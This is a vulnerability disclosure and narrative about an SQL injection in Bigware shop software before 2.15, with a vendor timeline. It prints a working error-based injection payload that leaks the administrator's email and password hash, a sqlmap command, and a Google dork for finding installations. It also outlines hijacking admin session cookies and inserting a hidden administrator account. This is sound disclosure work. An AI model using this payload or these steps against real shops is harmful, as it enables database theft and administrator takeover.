Summary main_bigware_43.php
The Bigware shop software prior to version 2.15 contains a SQL injection, resulting in full database compromise. The injection point is the POST parameter 'lastname' in the module main_bigware_43.php. A user must be created before exploitation.
Proof of concept is at http://files.dw-itsecurity.de/43.zip
Do it manually: Create a valid user at www.shopsite.com/main_bigware_10.php. Open www.shopsite.com/main_bigware_43.php and add the following statement in the field 'Nachname':
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT former_email_address
FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
former_password FROM former where former_groups_id like 1 LIMIT 0,1),
FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND '1' LIKE '1
The error message contains username and hashed password of the shop administrator.
Time line:
12/10/2011: Vendor contacted
12/10/2011: Vendor response
12/18/2011: Vendor patch release
12/19/2011: Vendor requested time to notify customers
01/23/2012: Disclosure
How it began
I wanted to buy an item at an online shop. I found what I was looking for, added it to the shopping cart and registered a new user to be able to check out. However, I had a typo in my address, so I logged back in with my user/pass combination and corrected my error. Since I do pentesting and a good friend used to say „Just add an ' from time to time in your requests.“, I added an apostrophe in every input field, clicked on 'apply' and looked on
1064 - You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '@_name name.de''
at line 1 update attendees set attendees_lastname = '@_name''
where attendees_email_address = '@_name name.de'
Looks like a possible SQL injection point to me. Just to make sure I added some SQL statement and I got
1064 - You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '' where
attendees_email_address = '@_vor.name name.de'' at line 1; update attendees
set ttendees_lastname = '@_name' and (select user from mysql.user)' where attendees_email_address = '@_vor.name name.de'
At this point I stopped further investigations and checked the impressum of the site to notify the shop owner. Hold on, what does it say there at the bottom of the site?
Diese Shopsoftware wurde entwickelt von Bigware.
I googled for bigware and found www.bigware.de, a company in Germany, providing service for their shop software.
First impressions
Using the google dork 'main_bigware_10.php' I found some 500 installations active. The only reported vulnerability is a SQL injection flaw from 2008 (CVE2008-0498). Futher googling revealed the pedigree of Bigware, it is a fork of osCommerce from 2001.
Before I contacted the guys at Bigware I wanted to confirm the vulnerability. Downloading the package from bigware.de and installing it on a virtual machine was done within a few minutes. Some more time later sqlmap reported
> python sqlmap.py -r request -p lastname
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: POST
Parameter: lastname
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
and I could access the database.
Threat analysis
What can I do with the above vulnerability? I own the database, so I can dump the table 'former' and try to crack the administrator credentials. They are 2-byte salted md5 hashes, so if the shop administrator uses a good password, bad luck for me. Right? Hold on, I do have access to the database table 'sessions', containing all active session cookies. So all I need to do is sit and wait for an administrator to log in, steal the cookie and log in. To make my life easier, the Bigware shop administration interface includes a nifty file manager and a database dumper. On my way through the database I discovered that I could add a second administrator in the table 'former' which is not shown in the shop frontend.
What is not possible? There is no code execution, no file up/download, no insert/update statements due to limitations in MySQL. Life ain't easy.